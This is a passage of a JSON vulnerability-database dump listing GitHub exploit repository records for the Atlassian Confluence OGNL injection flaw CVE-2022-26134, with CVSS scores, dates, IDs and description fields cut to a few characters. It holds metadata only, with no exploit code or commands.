"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-15T15:42:35", "id": "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-14T08:15:41", "description": "\u6279\u91cf\u9a8c\u8bc1 CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T05:46:48", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-14T08:13:08", "id": "2444574D-533F-593F-8E0E-68EA2B47EF55", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T23:16:27", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-14T01:28:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-14T10:35:04", "id": "46787A11-B7F1-54E3-A965-2AEFCD29DB29", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T05:50:07", "description": "# ConfluentPwn\nConfluence pre-auth ONGL injection remote code ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T04:53:31", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-26T13:24:44", "id": "83B145E2-F995-5B1C-863E-164839ED1173", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T20:07:17", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\n\nIn affected ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-21T11:49:48", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-22T06:59:37", "id": "1F9C946C-1533-5835-B5E8-641EF4FFC145", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-06T09:08:50", "description": "<h1 align=\"center\">Serein | \u8eab\u5904\u843d\u96e8\u7684\u9ec4\u660f</h1> \n<p align=\"center\"><im...", "cvss3": {}, "published": "2022-05-31T07:44:01", "type": "githubexploit", "title": "Exploit for CVE-2022-26134", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-06T09:02:20", "id": "C6912636-2CB2-54CA-9F78-1A4FF04CA119", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-08-18T02:21:40", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T11:55:37", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T22:41:05", "id": "469B060E-C585-599E-A0D1-AD5D186F70FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T20:07:06", "description": "# CVE-2022-26134 PoC\n\nConfluence Server and Data Center - CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:44:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-09T12:17:21", "id": "423DF4D5-60AF-5663-B196-2A67DD13D226", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-27T20:53:51", "description": "# CVE-2022-26134\nConfluence OGNL expression injected RCE(CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T11:16:28", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-27T18:20:33", "id": "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T18:02:22", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T13:02:10", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-26T03:47:11", "id": "228C8A28-3BE8-51C1-A7B0-993047B4EC76", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:56", "description": "# CVE-2022-26134-POC\nCVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T18:32:35", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:59", "id": "F8CD1EFD-78D9-5506-9555-5A12EFB752AB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T05:01:27", "description": "# Atlassian Confluence OGNL Injection POC Vulnerability CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-06T01:27:21", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-23T16:53:31", "id": "2B2A8A69-A893-5E85-8B02-6D8A77B54853", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:36", "description": "# CVE-2022-26134\r\n\uff08CVE-2022-26134\uff09an unauthenticated and remote ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:27:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:19:24", "id": "305ADB34-3669-5AAD-8D51-FCFFEF9E3F47", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-25T02:18:51", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T21:07:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-24T23:43:54", "id": "8F6AEAF4-2161-55F7-96CB-003251BDC309", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T20:07:09", "description": "# Confluence RCE [CVE-2022-26134] Exploit Detection\n\n## Pre-requ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:52:14", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:48", "id": "D22CFFB0-30A6-5227-8048-C9C028070BD3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-05T04:58:35", "description": "# [-] CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T23:01:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-05T01:06:00", "id": "FD4859A0-D69F-503C-BFDB-0C9025BDC68F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T20:00:27", "description": "# CVE-2022-26134\n\n\n# links\n\n https://confluence.atlassian.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T08:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-14T18:47:54", "id": "2D36D631-FAE1-5508-9C60-F4B807EC6C47", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T05:49:54", "description": "# CVE-2022-26134\n \n -u URL, --url URL \u76ee\u6807url\n \n -c COMM...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T02:11:58", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-22T17:49:52", "id": "12691014-3333-5741-80A4-3357BD72D2AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-15T07:58:22", "description": "# CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T18:23:20", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T06:14:20", "id": "09477170-A03D-5C2D-AC41-0D0A8F51EDB3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:58:56", "description": "# CVE-2022-26134 POC\n\n## Description\n```\nIn affected versions of...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T10:36:11", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-08T05:09:06", "id": "54DD3775-9F3C-54DF-93EF-372304E8EE4B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T22:58:01", "description": "# CVE-2022-26134\n \n -u URL, --url URL \u76ee\u6807url\n \n -c COMM...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T02:11:58", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": 